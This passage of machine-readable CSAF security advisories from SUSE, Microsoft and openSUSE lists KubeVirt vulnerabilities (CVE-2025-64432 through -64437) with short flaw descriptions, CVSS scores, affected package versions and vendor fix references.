"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
MSRC_CVE-2025-64433
Vulnerability from csaf_microsoft - Published: 2025-11-02 00:00 - Updated: 2025-12-23 01:37Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64433 KubeVirt Arbitrary Container File Read - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64433.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "KubeVirt Arbitrary Container File Read",
"tracking": {
"current_release_date": "2025-12-23T01:37:02.000Z",
"generator": {
"date": "2025-12-23T08:46:56.205Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-64433",
"initial_release_date": "2025-11-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-09T01:01:58.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2025-12-06T14:39:27.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2025-12-07T01:47:57.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2025-12-23T01:37:02.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "cbl2 kubevirt 0.59.0-30",
"product": {
"name": "cbl2 kubevirt 0.59.0-30",
"product_id": "3"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product": {
"name": "\u003ccbl2 kubevirt 0.59.0-31",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "cbl2 kubevirt 0.59.0-31",
"product": {
"name": "cbl2 kubevirt 0.59.0-31",
"product_id": "20703"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product": {
"name": "\u003cazl3 kubevirt 1.5.0-5",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5",
"product": {
"name": "azl3 kubevirt 1.5.0-5",
"product_id": "20656"
}
}
],
"category": "product_name",
"name": "kubevirt"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-30 as a component of CBL Mariner 2.0",
"product_id": "17086-3"
},
"product_reference": "3",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "17086-1"
},
"product_reference": "1",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 kubevirt 0.59.0-31 as a component of CBL Mariner 2.0",
"product_id": "20703-17086"
},
"product_reference": "20703",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "17084-2"
},
"product_reference": "2",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kubevirt 1.5.0-5 as a component of Azure Linux 3.0",
"product_id": "20656-17084"
},
"product_reference": "20656",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64433",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0026#39;Path Traversal\u0026#39;)"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20703-17086",
"20656-17084"
],
"known_affected": [
"17086-3",
"17086-1",
"17084-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64433 KubeVirt Arbitrary Container File Read - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-64433.json"
}
],
"remediations": [
{
"category": "none_available",
"date": "2025-11-09T01:01:58.000Z",
"details": "There is no fix available for this vulnerability as of now",
"product_ids": [
"17086-3"
]
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:58.000Z",
"details": "0.59.0-33:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-11-09T01:01:58.000Z",
"details": "1.5.3-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 6.5,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"17086-3",
"17086-1",
"17084-2"
]
}
],
"title": "KubeVirt Arbitrary Container File Read"
}
]
}
OPENSUSE-SU-2025:15772-1
Vulnerability from csaf_opensuse - Published: 2025-11-26 00:00 - Updated: 2025-11-26 00:00Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "kubevirt-container-disk-1.6.3-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the kubevirt-container-disk-1.6.3-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15772",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15772-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "kubevirt-container-disk-1.6.3-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-26T00:00:00Z",
"generator": {
"date": "2025-11-26T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15772-1",
"initial_release_date": "2025-11-26T00:00:00Z",
"revision_history": [
{
"date": "2025-11-26T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-container-disk-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-manifests-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-tests-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-api-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virtctl-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.s390x",
"product_id": "kubevirt-container-disk-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.s390x",
"product_id": "kubevirt-manifests-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.s390x",
"product_id": "kubevirt-tests-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-api-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.s390x",
"product_id": "kubevirt-virtctl-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
